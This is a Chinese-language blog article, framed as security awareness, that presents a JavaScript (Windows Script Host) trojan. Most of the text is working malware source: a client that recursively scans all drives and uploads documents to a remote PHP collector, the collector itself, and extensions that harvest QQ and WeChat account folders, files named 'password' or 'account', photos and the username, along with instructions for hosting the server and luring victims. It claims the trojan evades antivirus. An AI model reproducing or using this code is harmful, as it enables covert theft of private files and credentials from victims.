導讀：在日常電腦使用中，很多小伙伴都會從互聯網下載網站或是QQ、微信等聊天軟件中進行傳輸安裝軟件、文件等。略知網絡安全的朋友們都會比較謹慎所安裝的軟件是否安全，比如說通過殺毒軟件殺毒、通過對文件的后綴、圖標、大小等分析，那么這樣的操作真的就是安全的嗎？

相信大家都對遠程木馬有所了解，名氣最大的應該是灰鴿子遠程木馬，它就是通過后綴為exe文件誘導用戶點擊，從而造成個人隱私、文件的泄漏甚至金錢損失。

灰鴿子木馬界面

隨著互聯網安全工具越來越成熟，對之前的exe木馬文件的云查殺越發嚴格，基本上做過免殺的程序也挺不了多久就被發現，所以像這類的遠程木馬已經慢慢消失成為歷史。

但是道高一尺魔高一丈，最新的遠程木馬通過新的途徑新的方式悄然出現，它就是利用js代碼來獵取你的電腦文件，更為可怕的是它可以通過邏輯代碼自動地進入電腦文件中搜索預設好的文件后綴進行分析獲取，比如說代碼只想獲取你的聊天記錄，那么它會通過檢索查找到QQ、微信等數據庫文件上傳獲取、也可以通過查找相冊等目錄獲取照片等隱私文件，危害還是非常大的，本期文章小君就對js木馬進行分析，看它是如何獲取文件的。

首先js木馬的特點：

優點：

1. 文件小、js后綴善于隱藏，目前殺毒軟件對它用處不大，可完全通過360安全。
2. 危害大，可以自動搜索目標文件獲取。

缺點：

QQ傳輸引導中馬時會自動改后綴名稱，所以很大程度上是需要通過將js代碼進行壓縮后引導安裝。

使用方法：

首先需要木馬使用者搭建一臺服務器，當然也可以是虛擬空間、vps等都是可以的，然后搭建php環境，大家都知道像灰鴿子這類遠程木馬都有客戶端和服務端兩部分，那么js木馬同樣也有，需要在PHP環境下上傳服務端代碼server.php文件，在網站目錄下新建一個目錄upload用于獲取中馬者的隱私文件，接下來就是將js代碼也就是木馬的客戶端發送給被控者引導點擊，如果成功點擊，遠程服務器將會開始不斷收到上傳的隱私文件。

效果圖

代碼分享：

js木馬客戶端代碼如下：

var __POSTURL__ = 'http://www.xxx.com/server.php';

function UpFile(FilePath, FileName) {
        var Stream = new ActiveXObject('ADODB.Stream');
        Stream.Type = 1;
        Stream.Open();
        Stream.LoadFromFile(FilePath);
        var XHR = new ActiveXObject('Msxml2.XMLHTTP' || 'Microsoft.XMLHTTP');
        XHR.open('POST', __POSTURL__, false);
        XHR.setRequestHeader('fileName', FileName);
        XHR.setRequestHeader('enctype', 'multipart/form-data');
        XHR.send(Stream.Read());
        Stream.Close();
        return XHR.responseText
}
function GetDriveList() {
        var fso = new ActiveXObject("Scripting.FileSystemObject");
        var e = new Enumerator(fso.Drives);
        var re = [];
        for (; ! e.atEnd(); e.moveNext()) {
                if (e.item().IsReady) {
                        re.push(e.item().DriveLetter)
                }
        }
        return re
}
function GetFolderList(folderspec) {
        var fso = new ActiveXObject("Scripting.FileSystemObject");
        var f = fso.GetFolder(folderspec);
        var fc = new Enumerator(f.SubFolders);
        var re = [];
        for (; ! fc.atEnd(); fc.moveNext()) {
                re.push(fc.item())
        }
        return re
}
function GetFileList(folderspec) {
        var fso = new ActiveXObject("Scripting.FileSystemObject");
        var f = fso.GetFolder(folderspec);
        var fc = new Enumerator(f.files);
        var re = [];
        for (; ! fc.atEnd(); fc.moveNext()) {
                re.push([fc.item(), fc.item().Name])
        }
        return re
}
function Search(Drive) {
        var FolderList = GetFolderList(Drive);
        for (var i = 0; i < FolderList.length; i++) {
                Search(FolderList[i])
        }
        var FileList = GetFileList(Drive);
        for (var i = 0; i < FileList.length; i++) {
                if (/.(doc|docx|xls|xlsx)$/i.test(FileList[i])) {
                        UpFile(FileList[i][0], FileList[i][1])
                }
        }
}
function Load() {
        var WMIs = GetObject("winmgmts:\\.\root\cimv2");
        var Items = WMIs.ExecQuery("SELECT * FROM Win32_Process WHERE Name = 'wscript.exe'");
        var i = 0,
        rs = new Enumerator(Items);
        for (; ! rs.atEnd(); rs.moveNext()) {
                i++
        }
        if (i > 1) WScript.Quit(0);
        Items = WMIs = i = rs = null;
        var DriveList = GetDriveList();
        for (var i = 0; i < DriveList.length; i++) {
                Search(DriveList[i] + ":\\")
        }
}
Load();

PHP服務端代碼：

<?php
if($_SERVER['REQUEST_METHOD'] == 'POST'){
        $fileName = uniqid(rand()) . '_' . iconv('utf-8', 'gbk', $_SERVER['HTTP_FILENAME']);
        print_r(file_put_contents("uploads/{$fileName}", $HTTP_RAW_POST_DATA));
}
?>

還可以通過對js代碼的升級來實現更多新的功能

1、獲取微信、QQ等隱私信息

function GetQQWechat() {
        var QQList = [];
        var WechatList = [];
        var QQPath = "C:\Users\" + USERNAME+ "\Documents\Tencent Files"
        var WechatPath = "C:\Users\" + USERNAME+ "\Documents\WeChat Files"
        var Patt = new RegExp(/[^\]+$/);
        if (FSO.folderExists(QQPath)) {
                var QQFolderList = GetFolderList(QQPath);
                if (QQFolderList) {
                        for (var i = 0; i < QQFolderList.length; i++) {
                                var QQFolderStr = QQFolderList[i];
                                var QQResult = Patt.exec(QQFolderStr);
                                var QQ = "";
                                if (QQResult) QQ = QQResult[0];
                                if (QQ == "All Users") continue;
                                QQList.push(QQ);
                        }
                }
        }
        if (FSO.folderExists(WechatPath)) {
                var WechatFolderList = GetFolderList(WechatPath);
                if (WechatFolderList) {
                        for (var i = 0; i < WechatFolderList.length; i++) {
                                var WechatFolderStr = WechatFolderList[i];
                                var WechatResult = Patt.exec(WechatFolderStr);
                                var Wechat = "";
                                if (WechatResult) Wechat = WechatResult[0];
                                if (Wechat == "All Users") continue;
                                WechatList.push(Wechat);
                        }
                }
        }
        return {"QQList":QQList, "WechatList":WechatList}
}

2、通過政策表達式獲取文件名含"賬號"、"密碼"、"account"、"password"等文件

 if (/((賬號|密碼|password|passwd|account)+(.*)*.(txt|doc|docx|xls|xlsx)$)|(.(JPG|PNG)$)/.test(FileList[i][1])) {
    UpFile(FileList[i][0], FileList[i][1])
}

3、獲取目標電腦用戶名

function GetUserName() {
        var WshNetwork = new ActiveXObject("WScript.Network"); 
        var UserName = WshNetwork.UserName;
        return UserName; 
}

XHR.setRequestHeader('userName', USERNAME);

以上代碼僅供研究，請勿非法利用！

結語：

看到這里是不是感覺自己的電腦并非那么的安全，我們在日常使用中，首先要有一定的安全意識，任何文件的傳輸，不要不做分析就隨意雙擊打開，養成使用殺毒軟件查殺的習慣，雖然并不能保證完全被查殺，但最起碼也能過濾百分之九十以上的木馬文件，剩下的就要靠自己的分析和判斷，莫名其妙來源文件不接，圖標異常的不接、文件大小與所需要內容不對等的文件不接。感謝您閱讀本期網絡安全普及文章，如果本文對您有所幫助請關注點贊喲，如果在網絡安全中遇到問題請在評論區或私信留言。